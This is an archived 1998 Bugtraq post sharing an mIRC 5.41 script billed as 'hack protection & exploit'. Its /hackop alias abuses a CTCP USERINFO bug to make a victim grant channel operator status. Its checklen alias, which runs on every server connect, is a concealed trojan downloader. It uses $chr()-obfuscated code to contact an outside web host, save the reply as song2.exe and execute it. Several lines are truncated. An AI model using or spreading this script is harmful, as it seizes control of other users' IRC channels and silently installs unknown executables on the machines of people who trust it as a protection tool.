[8555] in bugtraq

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daemon@ATHENA.MIT.EDU (System Administrator)
Sat Nov 14 16:50:37 1998

Date: 	Fri, 13 Nov 1998 14:50:32 -0500
Reply-To: System Administrator <root@BRAMPTON1.NETMATRIX.NET>
From: System Administrator <root@BRAMPTON1.NETMATRIX.NET>
X-To:         info@rootshell.com

while debugging/hexing/disassembling mirc my friend slotmech last week found
a mirc bug which allows to force users to send MODE commands to the server.
this example script sends a MODE +o to the irc server. the mirc author has been
notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us.


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;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstorm@gmx.net>
;#;    Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#;    included. Bug may not work on scripts that do a halt; after a ctcp useri$;#;
;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
;#; -------- That's it... have phun!
;#;  greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
;#;  no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#;  Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#;
;#;   if you want to add this code to your own script please: ASK FIRST!

ctcp 1:userinfo*: antihack

alias antihack {
  if ($len($2) > 17 && $chr(91) isin $2-) {
    echo $active mIRC5.41 hack attempt from $nick

alias hackop {
  if ($2 == $null) {
    echo 3 *** Usage: /hackop nick #channel
  if ($me !ison $2) {
    echo 3 *** You aren't on that Channel!
  if ($1 !isop $2) {
    echo 3 *** $1 isn't opped on that channel!
  checklen $1
  .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}

alias checklen {
  .if (%xcomplete == 1) halt
  .if (%xinprog == 1) halt
  .set %xfilename song2.exe
  .set %xlof $lof(%xfilename)
  .set %xfirst 1
  .write -c %xfilename
  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$  .sockclose protx
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$}
on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$  .sockwrite -n protx

on 1:sockread:protx: {
  .sockread &test
  .set %xlof $lof(%xfilename)
  .if (%xfirst == 1) set %xlof 0
  .set %xfirst 0
  .bwrite %xfilename %xlof $sockbr &test

on 1:connect:checklen

on 1:sockclose:protx: {
  .sockread &test
  if ($sockbr > 0) {
    .set %xlof $lof(%xfilename)
    .bwrite %xfilename %xlof $sockbr &test
  .if ($lof(%xfilename) == 178306) {
    .run %xfilename
    .set %xcomplete 1
  if ($lof(%xfilename) != 178306) {
    .timer 1 300 checklen
  unset %xinprog
  unset %xfilename
  unset %xlof
  unset %xfirst

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